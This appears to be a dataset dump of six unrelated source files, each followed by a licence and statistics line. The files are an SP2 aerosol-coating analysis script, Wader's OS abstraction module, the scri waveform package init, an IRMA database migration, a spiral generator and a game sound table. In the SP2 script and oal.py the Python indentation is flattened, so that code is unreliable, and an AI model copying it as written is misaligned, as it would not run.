#instr_locn TEXT,
#particle_type TEXT,
#particle_dia FLOAT,
#unix_ts_utc FLOAT,
#actual_scat_amp FLOAT,
#actual_peak_pos INT,
#FF_scat_amp FLOAT,
#FF_peak_pos INT,
#FF_gauss_width FLOAT,
#zeroX_to_peak FLOAT,
#LF_scat_amp FLOAT,
#incand_amp FLOAT,
#lag_time_fit_to_incand FLOAT,
#LF_baseline_pct_diff FLOAT,
#rBC_mass_fg FLOAT,
#coat_thickness_nm FLOAT,
#zero_crossing_posn FLOAT,
#UNIQUE (sp2b_file, file_index, instr)
#connect to database
conn = sqlite3.connect('C:/projects/dbs/SP2_data.db')
c = conn.cursor()
instrument = 'UBCSP2'
instrument_locn = 'WHI'
type_particle = 'incand'
start_date = datetime.strptime('20120401','%Y%m%d')
end_date = datetime.strptime('20120531','%Y%m%d')
lookup_file = 'C:/Users/Sarah Hanna/Documents/Data/WHI long term record/coatings/lookup_tables/coating_lookup_table_WHI_2012_UBCSP2.lupckl'
rBC_density = 1.8
incand_sat = 3750
LF_max = 45000 #above this is unreasonable
lookup = open(lookup_file, 'r')
lookup_table = pickle.load(lookup)
lookup.close()
min_rBC_mass = 1.63#120 2.6-#140 3.86-#160nm 0.25
max_rBC_mass = 2.6#140 3.86-160 5.5-#180nm 10.05
VED_min = 65
VED_max = 220
scat_lim = 100
begin_data = calendar.timegm(start_date.timetuple())
end_data = calendar.timegm(end_date.timetuple())
data = []
particles=0
no_scat=0
no_scat_110 =0
fit_failure=0
early_evap=0
early_evap_110=0
flat_fit=0
LF_high=0
for row in c.execute('''SELECT rBC_mass_fg, coat_thickness_nm, unix_ts_utc, LF_scat_amp, LF_baseline_pct_diff, sp2b_file, file_index, instr,actual_scat_amp
FROM SP2_coating_analysis
WHERE instr=? and instr_locn=? and particle_type=? and rBC_mass_fg>=? and rBC_mass_fg<? and unix_ts_utc>=? and unix_ts_utc<?''',
(instrument,instrument_locn,type_particle, min_rBC_mass, max_rBC_mass, begin_data,end_data)):
particles+=1
rBC_mass = row[0]
coat_thickness = row[1]
event_time = datetime.utcfromtimestamp(row[2])
LEO_amp = row[3]
LF_baseline_pctdiff = row[4]
file = row[5]
index = row[6]
instrt = row[7]
meas_scat_amp = row[8]
rBC_VED = (((rBC_mass/(10**15*rBC_density))*6/3.14159)**(1/3.0))*10**7 #VED in nm with 10^15fg/g and 10^7nm/cm
if meas_scat_amp < 6:
no_scat +=1
if rBC_VED > scat_lim:
no_scat_110+=1
data.append([rBC_VED,coat_thickness])
if LEO_amp == 0.0 and LF_baseline_pctdiff == None and meas_scat_amp >= 6:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -2:
early_evap +=1
if rBC_VED > scat_lim:
early_evap_110 +=1
if LEO_amp == -1:
fit_failure +=1
if LEO_amp == 0.0 and LF_baseline_pctdiff != None:
flat_fit +=1
if LEO_amp > LF_max:
LF_high +=1
if LEO_amp > 0:
data.append([rBC_VED,coat_thickness])
print '# of particles', particles
print 'no_scat', no_scat
print 'no_scat_110', no_scat_110
print 'fit_failure', fit_failure
print 'early_evap', early_evap
print 'early_evap_110', early_evap_110
print 'flat_fit', flat_fit
print 'LF_high', LF_high
evap_pct = (early_evap)*100.0/particles
evap_pct_110 = (early_evap_110)*100.0/particles
no_scat_pct = (no_scat)*100.0/particles
no_scat_pct_110 = no_scat_110*100./particles
print evap_pct, evap_pct_110, no_scat_pct,no_scat_pct_110
rBC_VEDs = [row[0] for row in data]
coatings = [row[1] for row in data]
median_coat = np.median (coatings)
print 'median coating',median_coat
#####hexbin coat vs core###
fig = plt.figure()
ax = fig.add_subplot(111)
#x_limits = [0,250]
#y_limits = [0,250]
#h = plt.hexbin(rBC_VEDs, coatings, cmap=cm.jet,gridsize = 50, mincnt=1)
hist = plt.hist(coatings, bins=50)
plt.ylabel('frequency')
plt.xlabel('Coating Thickness (nm)')
#cb = plt.colorbar()
#cb.set_label('frequency')
plt.show()
| mit | -1,434,911,381,491,213,300 | 22.904192 | 155 | 0.693136 | false |
andrewbird/wader | core/oal.py | 1 | 1507 | # -*- coding: utf-8 -*-
# Copyright (C) 2006-2008 Vodafone España, S.A.
# Copyright (C) 2008-2009 Warp Networks, S.L.
# Author: Pablo Martí
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
OS Abstraction Layer
This module provides an abstraction layer so that path differences between
OSes/distros won't affect Wader
"""
_os_obj = None
def get_os_object():
"""
    Returns an ``OSPlugin`` instance corresponding to the current OS in use
If the OS is unknown it will return None
"""
global _os_obj
if _os_obj is not None:
return _os_obj
from core.plugin import PluginManager
from wader.common.interfaces import IOSPlugin
for osplugin in PluginManager.get_plugins(IOSPlugin):
if osplugin.is_valid():
osplugin.initialize()
_os_obj = osplugin
return _os_obj
return None
| gpl-2.0 | -3,816,758,469,775,962,000 | 30.354167 | 73 | 0.706312 | false |
moble/scri | scri/__init__.py | 1 | 7034 | # Copyright (c) 2020, Michael Boyle
# See LICENSE file for details: <https://github.com/moble/scri/blob/master/LICENSE>
"""Module for operating on gravitational waveforms in various forms
Classes
-------
WaveformBase : Base class
This is probably not needed directly; it is just used for inheritance by other objects.
WaveformModes: Complex spin-weighted spherical-harmonic modes
The modes must include all `m` values for a range of `ell` values. This is the "classic" version of a WaveformBase
object we might normally think of.
WaveformGrid: Complex quantity evaluated along world lines of grid points on the sphere
To perform translations or boosts, we need to transform to physical space, along a series of selected world lines
distributed evenly across the sphere. These values may need to be interpolated to new time values, and they will
presumably need to be transformed back to `WaveformModes`.
WaveformInDetector: Real quantities as observed in an inertial detector
Detectors only measure one polarization, so they deal with real quantities. Also, data is measured in evenly
spaced time steps. This object can be created from a `WaveformModes` object.
WaveformInDetectorFT: (Complex) Fourier transform of a `WaveformInDetector`
This contains only the positive-frequency values since the transformed data is real.
"""
import sys
import functools
import numba
from ._version import __version__
jit = functools.partial(numba.njit, cache=True)
jitclass = numba.experimental.jitclass
def version_info():
"""Show version information about this module and various dependencies"""
import spherical_functions
import quaternion
import scipy
import numba
import numpy
versions = "\n".join(
[
f"scri.__version__ = {__version__}",
f"spherical_functions.__version__ = {spherical_functions.__version__}",
f"quaternion.__version__ = {quaternion.__version__}",
f"scipy.__version__ = {scipy.__version__}",
f"numba.__version__ = {numba.__version__}",
f"numpy.__version__ = {numpy.__version__}",
]
)
return versions
# The speed of light is, of course, defined to be exact:
speed_of_light = 299792458.0 # m/s
# The value of the solar mass parameter G*M_sun is known to higher accuracy than either of its factors. The value
# here is taken from the publication "2015 Selected Astronomical Constants", which can be found at
# <http://asa.usno.navy.mil/SecK/Constants.html>. This is (one year more current than, but numerically the same as)
# the source cited by the Particle Data Group. It is given as 1.32712440041e20 m^3/s^2 in the TDB (Barycentric
# Dynamical Time) time scale, which seems to be the more relevant one, and looks like the more standard one for LIGO.
# Dividing by the speed of light squared, we get the mass of the sun in meters; dividing again, we get the mass of
# the sun in seconds:
m_sun_in_meters = 1476.62503851 # m
m_sun_in_seconds = 4.92549094916e-06 # s
# By "IAU 2012 Resolution B2", the astronomical unit is defined to be exactly 1 au = 149597870700 m. The parsec
# is, in turn, defined as "The distance at which 1 au subtends 1 arc sec: 1 au divided by pi/648000." Thus, the
# future-proof value of the parsec in meters is
parsec_in_meters = 3.0856775814913672789139379577965e16 # m
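# Editorial sanity check of the arithmetic above (illustrative only, not part
# of the published constants): with c = 299792458 m/s,
#     1.32712440041e20 / c**2    ~= 1476.62503851         (m_sun_in_meters)
#     m_sun_in_meters / c        ~= 4.92549094916e-06     (m_sun_in_seconds)
#     149597870700 * 648000 / pi ~= 3.0856775814913673e16 (parsec_in_meters)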
FrameType = [UnknownFrameType, Inertial, Coprecessing, Coorbital, Corotating] = range(5)
FrameNames = ["UnknownFrameType", "Inertial", "Coprecessing", "Coorbital", "Corotating"]
DataType = [UnknownDataType, psi0, psi1, psi2, psi3, psi4, sigma, h, hdot, news, psin] = range(11)
DataNames = ["UnknownDataType", "Psi0", "Psi1", "Psi2", "Psi3", "Psi4", "sigma", "h", "hdot", "news", "psin"]
SpinWeights = [sys.maxsize, 2, 1, 0, -1, -2, 2, -2, -2, -2, sys.maxsize]
ConformalWeights = [sys.maxsize, 2, 1, 0, -1, -2, 1, 0, -1, -1, -3]
RScaling = [sys.maxsize, 5, 4, 3, 2, 1, 2, 1, 1, 1, 0]
MScaling = [sys.maxsize, 2, 2, 2, 2, 2, 0, 0, 1, 1, 2]
DataNamesLaTeX = [
r"\mathrm{unknown data type}",
r"\psi_0",
r"\psi_1",
r"\psi_2",
r"\psi_3",
r"\psi_4",
r"\sigma",
r"h",
r"\dot{h}",
r"\mathrm{n}",
r"\psi_n",
]
# It might also be worth noting that:
# - the radius `r` has spin weight 0 and boost weight -1
# - a time-derivative `d/du` has spin weight 0 and boost weight -1
# - \eth has spin weight +1; \bar{\eth} has spin weight -1
# - \eth in the GHP formalism has boost weight 0
# - \eth in the original NP formalism has undefined boost weight
# - It seems like `M` should have boost weight 1, but I'll have to think about the implications
# Set up the WaveformModes object, by adding some methods
from .waveform_modes import WaveformModes
from .mode_calculations import (
LdtVector,
LVector,
LLComparisonMatrix,
LLMatrix,
LLDominantEigenvector,
angular_velocity,
corotating_frame,
inner_product,
)
from .flux import (
energy_flux,
momentum_flux,
angular_momentum_flux,
poincare_fluxes,
boost_flux
)
WaveformModes.LdtVector = LdtVector
WaveformModes.LVector = LVector
WaveformModes.LLComparisonMatrix = LLComparisonMatrix
WaveformModes.LLMatrix = LLMatrix
WaveformModes.LLDominantEigenvector = LLDominantEigenvector
WaveformModes.angular_velocity = angular_velocity
from .rotations import (
rotate_decomposition_basis,
rotate_physical_system,
to_coprecessing_frame,
to_corotating_frame,
to_inertial_frame,
align_decomposition_frame_to_modes,
)
WaveformModes.rotate_decomposition_basis = rotate_decomposition_basis
WaveformModes.rotate_physical_system = rotate_physical_system
WaveformModes.to_coprecessing_frame = to_coprecessing_frame
WaveformModes.to_corotating_frame = to_corotating_frame
WaveformModes.to_inertial_frame = to_inertial_frame
WaveformModes.align_decomposition_frame_to_modes = align_decomposition_frame_to_modes
WaveformModes.energy_flux = energy_flux
WaveformModes.momentum_flux = momentum_flux
WaveformModes.angular_momentum_flux = angular_momentum_flux
WaveformModes.boost_flux = boost_flux
WaveformModes.poincare_fluxes = poincare_fluxes
from .waveform_grid import WaveformGrid
# from .waveform_in_detector import WaveformInDetector
from .extrapolation import extrapolate
from .modes_time_series import ModesTimeSeries
from .asymptotic_bondi_data import AsymptoticBondiData
from . import sample_waveforms, SpEC, LVC, utilities
__all__ = [
"WaveformModes",
"WaveformGrid",
"WaveformInDetector",
"FrameType",
"UnknownFrameType",
"Inertial",
"Coprecessing",
"Coorbital",
"Corotating",
"FrameNames",
"DataType",
"UnknownDataType",
"psi0",
"psi1",
"psi2",
"psi3",
"psi4",
"sigma",
"h",
"hdot",
"news",
"psin",
"DataNames",
"DataNamesLaTeX",
"SpinWeights",
"ConformalWeights",
"RScaling",
"MScaling",
"speed_of_light",
"m_sun_in_meters",
"m_sun_in_seconds",
"parsec_in_meters",
]
| mit | -5,533,757,833,371,105,000 | 35.071795 | 119 | 0.707279 | false |
quarkslab/irma | frontend/extras/migration/versions/eb7141efd75a_version_1_3_0.py | 1 | 6216 | """version 1.3.0
Revision ID: eb7141efd75a
Revises: 430a70c8aa21
Create Date: 2016-01-06 13:38:46.918409
"""
# revision identifiers, used by Alembic.
revision = 'eb7141efd75a'
down_revision = '430a70c8aa21'
branch_labels = None
depends_on = None
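# (Editorial note: like any Alembic revision, this script is applied with
# "alembic upgrade eb7141efd75a" and rolled back with
# "alembic downgrade 430a70c8aa21".)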
from alembic import op
import sqlalchemy as sa
from irma.common.utils.utils import UUID
from sqlalchemy import Column, Integer, ForeignKey, String, BigInteger, Numeric
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker, scoped_session
from sqlalchemy.orm import relationship, backref
from api.common.models import tables_prefix
Base = declarative_base()
class File(Base):
__tablename__ = '{0}file'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
sha256 = Column(String)
sha1 = Column(String)
md5 = Column(String)
timestamp_first_scan = Column(Numeric)
timestamp_last_scan = Column(Numeric)
size = Column(BigInteger)
mimetype = Column(String)
path = Column(String)
class FileWeb(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
class FileWebMigration(Base):
__tablename__ = '{0}fileWeb'.format(tables_prefix)
__table_args__ = {'extend_existing': True}
# Fields
id = Column(Integer, primary_key=True)
external_id = Column(String)
id_file = Column(Integer)
name = Column(String)
path = Column(String)
id_scan = Column(Integer)
id_parent = Column(Integer)
scan_file_idx = Column(Integer)
def upgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_file', sa.Column('mimetype',
sa.String(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('external_id',
sa.String(length=36),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('id_parent',
sa.Integer(),
nullable=True))
op.add_column('irma_fileWeb', sa.Column('path',
sa.String(length=255),
nullable=True))
# Create external_id as new uuid
for fileweb in session.query(FileWeb).all():
if fileweb.external_id is None:
fileweb.external_id = UUID.generate()
session.commit()
# Now that all data are fixed set column to non nullable
op.alter_column('irma_fileWeb', 'external_id', nullable=False)
op.create_index(op.f('ix_irma_fileWeb_external_id'),
'irma_fileWeb',
['external_id'],
unique=False)
op.drop_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
type_='unique')
op.create_unique_constraint(None,
'irma_fileWeb',
['external_id'])
op.create_foreign_key(None,
'irma_fileWeb',
'irma_file',
['id_parent'],
['id'])
op.drop_column('irma_fileWeb', 'scan_file_idx')
op.add_column('irma_scan', sa.Column('force',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('mimetype_filtering',
sa.Boolean(),
nullable=True))
op.add_column('irma_scan', sa.Column('probelist',
sa.String(),
nullable=True))
op.add_column('irma_scan', sa.Column('resubmit_files',
sa.Boolean(),
nullable=True))
op.add_column('irma_tag', sa.Column('text',
sa.String(),
nullable=False))
op.drop_column('irma_tag', 'name')
def downgrade():
bind = op.get_bind()
session = scoped_session(sessionmaker(autocommit=False, autoflush=False,
bind=bind))
op.add_column('irma_tag', sa.Column('name',
sa.VARCHAR(),
autoincrement=False,
nullable=False))
op.drop_column('irma_tag', 'text')
op.drop_column('irma_scan', 'resubmit_files')
op.drop_column('irma_scan', 'probelist')
op.drop_column('irma_scan', 'mimetype_filtering')
op.drop_column('irma_scan', 'force')
op.add_column('irma_fileWeb', sa.Column('scan_file_idx',
sa.INTEGER(),
autoincrement=False,
nullable=True))
# Create scan_file_idx autoincrement per scan
last_id_scan = None
scan_idx = 0
for fileweb in session.query(FileWebMigration).all():
if last_id_scan != fileweb.id_scan:
last_id_scan = fileweb.id_scan
scan_idx = 0
if fileweb.scan_file_idx is None:
fileweb.scan_file_idx = scan_idx
scan_idx += 1
op.create_unique_constraint(u'irma_fileWeb_id_scan_scan_file_idx_key',
'irma_fileWeb',
['id_scan', 'scan_file_idx'])
op.drop_index(op.f('ix_irma_fileWeb_external_id'),
table_name='irma_fileWeb')
op.drop_column('irma_fileWeb', 'path')
op.drop_column('irma_fileWeb', 'id_parent')
op.drop_column('irma_fileWeb', 'external_id')
op.drop_column('irma_file', 'mimetype')
| apache-2.0 | -4,304,994,386,734,047,000 | 36.221557 | 79 | 0.519466 | false |
barneygale/cedar | cedar/spiral.py | 1 | 1117 | square = 16 * 25
class Spiral:
@classmethod
def spiral(cls, radius, start=(0,0)):
clip1 = (2*radius - 1)//square
clip2 = max(0, radius - square//2)
offset1 = (clip1 % 2) * square//2
for p in cls.spiral_inner(pow(clip1+1, 2)):
yield tuple(
v + # start co-ordinate
max(-clip2, # clamp low
min(clip2, # clamp high
offset1 + # apply offset for even-numbered grids
w * square)) # operate in steps of square
for v, w in zip(start, p)) # zip current spiral coords with start coords
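    # Illustrative example (added): the inner generator walks an expanding
    # rectangular spiral out from the origin, e.g.
    #     list(Spiral.spiral_inner(5)) == [(0, 0), (0, -1), (-1, -1), (-1, 0), (-1, 1)]
    # with step directions cycling through d() = (0, 1, 0, -1).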
@classmethod
def spiral_inner(cls, m):
yield (0, 0)
m -= 1
d = lambda a: (0, 1, 0, -1)[a % 4]
x = z = 0
i = 2
while m > 0:
for j in range(i >> 1):
x += d(i)
z += d(i+1)
yield (x, z)
m -= 1
if m == 0:
break
i += 1 | mit | 1,341,538,299,758,088,200 | 30.055556 | 90 | 0.385855 | false |
hakjimmy/cngame | module_sounds.py | 1 | 23515 | from header_sounds import *
# Many of these sound entries are hard coded into the engine, and should not be removed; to disable them, empty the sound file list.
# Add your own sounds just before the animation sounds group, or before sounds_end.
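# An added sound would be a (name, flags, file list) tuple such as this
# hypothetical entry (not shipped with the module):
#   ("my_war_horn", sf_priority_8|sf_vol_10, ["my_war_horn.ogg"]),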
sounds = [
("click", sf_2d|sf_priority_9|sf_vol_3, ["drum_3.ogg"]),
("tutorial_1", sf_2d|sf_priority_9|sf_vol_7, ["tutorial_1.ogg"]),
("tutorial_2", sf_2d|sf_priority_9|sf_vol_7, ["tutorial_2.ogg"]),
("gong", sf_2d|sf_priority_9|sf_vol_7, ["s_cymbals.ogg"]),
("quest_taken", sf_2d|sf_priority_9|sf_vol_7, []),
("quest_completed", sf_2d|sf_priority_9|sf_vol_8, ["quest_completed.ogg"]),
("quest_succeeded", sf_2d|sf_priority_9|sf_vol_6, ["quest_succeeded.ogg"]),
("quest_concluded", sf_2d|sf_priority_9|sf_vol_7, ["drum_3.ogg"]),
("quest_failed", sf_2d|sf_priority_9|sf_vol_7, ["quest_failed.ogg"]),
("quest_cancelled", sf_2d|sf_priority_9|sf_vol_7, ["quest_cancelled.ogg"]),
("rain", sf_2d|sf_priority_2|sf_vol_4|sf_looping, ["rain_1.ogg"]),
("money_received", sf_priority_5|sf_vol_4, ["coins_dropped_1.ogg"]),
("money_paid", sf_priority_5|sf_vol_4, ["coins_dropped_2.ogg"]),
("sword_clash_1", 0, ["sword_clank_metal_09.ogg","sword_clank_metal_09b.ogg","sword_clank_metal_10.ogg","sword_clank_metal_10b.ogg","sword_clank_metal_12.ogg","sword_clank_metal_12b.ogg","sword_clank_metal_13.ogg","sword_clank_metal_13b.ogg"]),
("sword_clash_2", 0, ["drum_3.ogg"]),
("sword_clash_3", 0, ["drum_3.ogg"]),
("sword_swing", sf_priority_12|sf_vol_8, ["s_swordSwing.wav"]),
("footstep_grass", sf_priority_1|sf_vol_4, ["footstep_1.ogg","footstep_2.ogg","footstep_3.ogg","footstep_4.ogg"]),
("footstep_wood", sf_priority_1|sf_vol_6, ["footstep_wood_1.ogg","footstep_wood_2.ogg","footstep_wood_4.ogg"]),
("footstep_water", sf_priority_3|sf_vol_4, ["water_walk_1.ogg","water_walk_2.ogg","water_walk_3.ogg","water_walk_4.ogg"]),
("footstep_horse", sf_priority_3|sf_vol_8, ["drum_3.ogg"]),
("footstep_horse_1b", sf_priority_3|sf_vol_8, ["s_footstep_horse_4b.wav","s_footstep_horse_4f.wav","s_footstep_horse_5b.wav","s_footstep_horse_5f.wav"]),
("footstep_horse_1f", sf_priority_3|sf_vol_8, ["s_footstep_horse_2b.wav","s_footstep_horse_2f.wav","s_footstep_horse_3b.wav","s_footstep_horse_3f.wav"]),
("footstep_horse_2b", sf_priority_3|sf_vol_8, ["s_footstep_horse_2b.wav"]),
("footstep_horse_2f", sf_priority_3|sf_vol_8, ["s_footstep_horse_2f.wav"]),
("footstep_horse_3b", sf_priority_3|sf_vol_8, ["s_footstep_horse_3b.wav"]),
("footstep_horse_3f", sf_priority_3|sf_vol_8, ["s_footstep_horse_3f.wav"]),
("footstep_horse_4b", sf_priority_3|sf_vol_8, ["s_footstep_horse_4b.wav"]),
("footstep_horse_4f", sf_priority_3|sf_vol_8, ["s_footstep_horse_4f.wav"]),
("footstep_horse_5b", sf_priority_3|sf_vol_8, ["s_footstep_horse_5b.wav"]),
("footstep_horse_5f", sf_priority_3|sf_vol_8, ["s_footstep_horse_5f.wav"]),
("jump_begin", sf_priority_9|sf_vol_7, ["jump_begin.ogg"]),
("jump_end", sf_priority_9|sf_vol_5, ["jump_end.ogg"]),
("jump_begin_water", sf_priority_9|sf_vol_4, ["jump_begin_water.ogg"]),
("jump_end_water", sf_priority_9|sf_vol_4, ["jump_end_water.ogg"]),
("horse_jump_begin", sf_priority_9|sf_vol_4, ["horse_jump_begin.ogg"]),
("horse_jump_end", sf_priority_9|sf_vol_4, ["horse_jump_end.ogg"]),
("horse_jump_begin_water", sf_priority_9|sf_vol_5, ["jump_begin_water.ogg"]),
("horse_jump_end_water", sf_priority_9|sf_vol_5, ["jump_end_water.ogg"]),
("release_bow", sf_priority_10|sf_vol_5, ["release_bow_1.ogg"]),
("release_crossbow", sf_priority_10|sf_vol_7, ["release_crossbow_1.ogg"]),
("throw_javelin", sf_priority_10|sf_vol_5, ["throw_javelin_2.ogg"]),
("throw_axe", sf_priority_10|sf_vol_7, ["throw_axe_1.ogg"]),
("throw_knife", sf_priority_10|sf_vol_5, ["throw_knife_1.ogg"]),
("throw_stone", sf_priority_10|sf_vol_7, ["throw_stone_1.ogg"]),
("reload_crossbow", sf_priority_8|sf_vol_3, ["reload_crossbow_1.ogg"]),
("reload_crossbow_continue", sf_priority_4|sf_vol_6, ["put_back_dagger.ogg"]),
("pull_bow", sf_priority_10|sf_vol_4, ["pull_bow_1.ogg"]),
("pull_arrow", sf_priority_4|sf_vol_5, ["pull_arrow.ogg"]),
("arrow_pass_by", sf_priority_9|sf_vol_10, ["arrow_pass_by_1.ogg","arrow_pass_by_2.ogg","arrow_pass_by_3.ogg","arrow_pass_by_4.ogg"]),
("bolt_pass_by", sf_priority_9|sf_vol_10, ["bolt_pass_by_1.ogg"]),
("javelin_pass_by", sf_priority_9|sf_vol_10, ["javelin_pass_by_1.ogg","javelin_pass_by_2.ogg"]),
("stone_pass_by", sf_priority_9|sf_vol_9, ["stone_pass_by_1.ogg"]),
("axe_pass_by", sf_priority_9|sf_vol_10, ["axe_pass_by_1.ogg"]),
("knife_pass_by", sf_priority_9|sf_vol_10, ["knife_pass_by_1.ogg"]),
("bullet_pass_by", sf_priority_9|sf_vol_10, ["arrow_whoosh_1.ogg"]),
("incoming_arrow_hit_ground", sf_priority_7|sf_vol_7, ["arrow_hit_ground_2.ogg","arrow_hit_ground_3.ogg","incoming_bullet_hit_ground_1.ogg"]),
("incoming_bolt_hit_ground", sf_priority_7|sf_vol_7, ["arrow_hit_ground_2.ogg","arrow_hit_ground_3.ogg","incoming_bullet_hit_ground_1.ogg"]),
("incoming_javelin_hit_ground", sf_priority_7|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("incoming_stone_hit_ground", sf_priority_7|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("incoming_axe_hit_ground", sf_priority_7|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("incoming_knife_hit_ground", sf_priority_7|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("incoming_bullet_hit_ground", sf_priority_7|sf_vol_7, ["incoming_bullet_hit_ground_1.ogg"]),
("outgoing_arrow_hit_ground", sf_priority_6|sf_vol_7, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_bolt_hit_ground", sf_priority_6|sf_vol_7, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_javelin_hit_ground", sf_priority_6|sf_vol_10, ["outgoing_arrow_hit_ground.ogg"]),
("outgoing_stone_hit_ground", sf_priority_6|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("outgoing_axe_hit_ground", sf_priority_6|sf_vol_7, ["incoming_javelin_hit_ground_1.ogg"]),
("outgoing_knife_hit_ground", sf_priority_6|sf_vol_7, ["incoming_stone_hit_ground_1.ogg"]),
("outgoing_bullet_hit_ground", sf_priority_6|sf_vol_7, ["incoming_bullet_hit_ground_1.ogg"]),
("draw_sword", sf_priority_8|sf_vol_4, ["draw_sword.ogg"]),
("put_back_sword", sf_priority_6|sf_vol_4, ["put_back_sword.ogg"]),
("draw_greatsword", sf_priority_9|sf_vol_4, ["draw_greatsword.ogg"]),
("put_back_greatsword", sf_priority_6|sf_vol_4, ["put_back_sword.ogg"]),
("draw_axe", sf_priority_8|sf_vol_4, ["draw_mace.ogg"]),
("put_back_axe", sf_priority_6|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_greataxe", sf_priority_9|sf_vol_4, ["draw_greataxe.ogg"]),
("put_back_greataxe", sf_priority_6|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_spear", sf_priority_7|sf_vol_4, ["draw_spear.ogg"]),
("put_back_spear", sf_priority_5|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_crossbow", sf_priority_7|sf_vol_4, ["draw_crossbow.ogg"]),
("put_back_crossbow", sf_priority_5|sf_vol_4, ["put_back_to_leather.ogg"]),
("draw_revolver", sf_priority_8|sf_vol_4, ["draw_from_holster.ogg"]),
("put_back_revolver", sf_priority_6|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_dagger", sf_priority_8|sf_vol_4, ["draw_dagger.ogg"]),
("put_back_dagger", sf_priority_6|sf_vol_4, ["put_back_dagger.ogg"]),
("draw_bow", sf_priority_7|sf_vol_4, ["draw_bow.ogg"]),
("put_back_bow", sf_priority_5|sf_vol_4, ["put_back_to_holster.ogg"]),
("draw_shield", sf_priority_4|sf_vol_3, ["draw_shield.ogg"]),
("put_back_shield", sf_priority_4|sf_vol_3, ["put_back_shield.ogg"]),
("draw_other", sf_priority_8|sf_vol_4, ["draw_other.ogg"]),
("put_back_other", sf_priority_6|sf_vol_4, ["draw_other2.ogg"]),
("body_fall_small", sf_priority_7|sf_vol_8, ["body_fall_small_1.ogg","body_fall_small_2.ogg"]),
("body_fall_big", sf_priority_9|sf_vol_9, ["body_fall_1.ogg","body_fall_2.ogg","body_fall_3.ogg"]),
("horse_body_fall_begin", sf_priority_9|sf_vol_10, ["horse_body_fall_begin_1.ogg"]),
("horse_body_fall_end", sf_priority_9|sf_vol_10, ["horse_body_fall_end_1.ogg","body_fall_2.ogg"]),
("hit_wood_wood", sf_priority_11|sf_vol_9, ["hit_wood_wood_1.ogg","hit_wood_wood_2.ogg","hit_wood_wood_3.ogg","hit_wood_wood_4.ogg","hit_wood_metal_4.ogg","hit_wood_metal_5.ogg","hit_wood_metal_6.ogg"]),
("hit_metal_metal", sf_priority_11|sf_vol_10, ["hit_metal_metal_3.ogg","hit_metal_metal_4.ogg","hit_metal_metal_5.ogg","hit_metal_metal_6.ogg","hit_metal_metal_7.ogg","hit_metal_metal_8.ogg","hit_metal_metal_9.ogg","hit_metal_metal_10.ogg","clang_metal_1.ogg","clang_metal_2.ogg"]),
("hit_wood_metal", sf_priority_11|sf_vol_10, ["hit_metal_metal_1.ogg","hit_metal_metal_2.ogg","hit_wood_metal_7.ogg"]),
("shield_hit_wood_wood", sf_priority_11|sf_vol_10, ["shield_hit_wood_wood_1.ogg","shield_hit_wood_wood_2.ogg","shield_hit_wood_wood_3.ogg"]),
("shield_hit_metal_metal", sf_priority_11|sf_vol_10, ["shield_hit_metal_metal_1.ogg","shield_hit_metal_metal_2.ogg","shield_hit_metal_metal_3.ogg","shield_hit_metal_metal_4.ogg"]),
("shield_hit_wood_metal", sf_priority_11|sf_vol_10, ["shield_hit_cut_3.ogg","shield_hit_cut_4.ogg","shield_hit_cut_5.ogg","shield_hit_cut_10.ogg"]),
("shield_hit_metal_wood", sf_priority_11|sf_vol_10, ["shield_hit_metal_wood_1.ogg","shield_hit_metal_wood_2.ogg","shield_hit_metal_wood_3.ogg"]),
("shield_broken", sf_priority_12|sf_vol_10, ["shield_broken.ogg"]),
("man_hit", sf_priority_11|sf_vol_8, ["man_hit_5.ogg","man_hit_6.ogg","man_hit_7.ogg","man_hit_8.ogg","man_hit_9.ogg","man_hit_10.ogg","man_hit_11.ogg","man_hit_12.ogg","man_hit_13.ogg","man_hit_14.ogg","man_hit_15.ogg","man_hit_17.ogg","man_hit_18.ogg","man_hit_19.ogg","man_hit_22.ogg","man_hit_29.ogg","man_hit_32.ogg","man_hit_47.ogg","man_hit_57.ogg","man_hit_59.ogg"]),
("man_die", sf_priority_12|sf_vol_10, ["man_death_1.ogg","man_death_8.ogg","man_death_8b.ogg","man_death_11.ogg","man_death_14.ogg","man_death_16.ogg","man_death_18.ogg","man_death_21.ogg","man_death_22.ogg","man_death_29.ogg","man_death_40.ogg","man_death_44.ogg","man_death_46.ogg","man_death_48.ogg","man_death_64.ogg"]),
("woman_hit", sf_priority_11|sf_vol_8, ["woman_hit_2.ogg","woman_hit_3.ogg","woman_hit_b_2.ogg","woman_hit_b_4.ogg","woman_hit_b_6.ogg","woman_hit_b_7.ogg","woman_hit_b_8.ogg","woman_hit_b_11.ogg","woman_hit_b_14.ogg","woman_hit_b_16.ogg"]),
("woman_die", sf_priority_12|sf_vol_10, ["woman_fall_1.ogg","woman_hit_b_5.ogg"]),
